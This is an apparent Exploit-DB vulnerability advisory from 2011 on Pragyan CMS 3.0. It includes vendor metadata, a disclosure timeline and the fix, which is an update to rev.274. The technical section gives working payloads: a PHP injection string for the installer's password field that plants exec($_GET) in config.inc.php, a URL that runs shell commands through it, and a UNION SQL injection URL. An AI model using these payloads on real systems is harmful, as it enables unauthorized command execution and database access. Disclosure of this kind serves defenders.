Pragyan CMS v 3.0 mutiple Vulnerabilities

vendor:

Pragyan CMS

by:

Villy and Abhishek Lyall

8.8

CVSS

HIGH

Code Execution, SQL Injection

78, 89

CWE

Product Name: Pragyan CMS

Affected Version From: 3

Affected Version To: 3

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Pragyan CMS v 3.0 mutiple Vulnerabilities

The script in INSTALL/install.php does not correctly validate entered fields, allowing for code execution. Additionally, a SQL injection vulnerability exists, allowing for the retrieval of the MySQL version.

Mitigation:

Update to Pragyan CMS 3.0 rev.274

Source

Exploit-DB raw data:

#Pragyan CMS v 3.0 mutiple Vulnerabilities
#Author Villy and Abhishek Lyall - villys777[at]gmail[dot]com,
abhilyall[at]gmail[dot]com
#Web - http://www.aslitsecurity.com/
#Blog - http://bugix-security.blogspot.com
#http://www.aslitsecurity.blogspot.com/
#Pragyan CMS v 3.0

Technical Description


1) Code execution in INSTALL/install.php
script not correctly validate entered fields.
possibility to write at password field string:

");echo exec($_GET["a"]);echo ("

or in another fields with turned of javascript.
in cms/config.inc.php will be code:
define("MYSQL_PASSWORD","");echo exec($_GET["a"]);echo ("");
which allows command execution.

EXPLOIT:: http://target.com/blog/cms/config.inc.php?a=ls -la

2) sql injection
- get mysql version EXPLOIT::
http://target.com/path/+view&thread_id=-1 UNION ALL SELECT
null,null,null,null,concat(unhex(Hex(cast(@@version as
char)))),null,null,null--

Solution
update to Pragyan CMS 3.0 rev.274

Changelog
2011-19-02 : Initial release
2011-20-02 : Reported to vendor
2011-25-02 : patch released
2011-25-02 : public disclose

Credits
Villy
Abhishek Lyall
pragyan.org
http://bugix-security.blogspot.com
http://www.aslitsecurity.blogspot.com/


Abhishek Lyall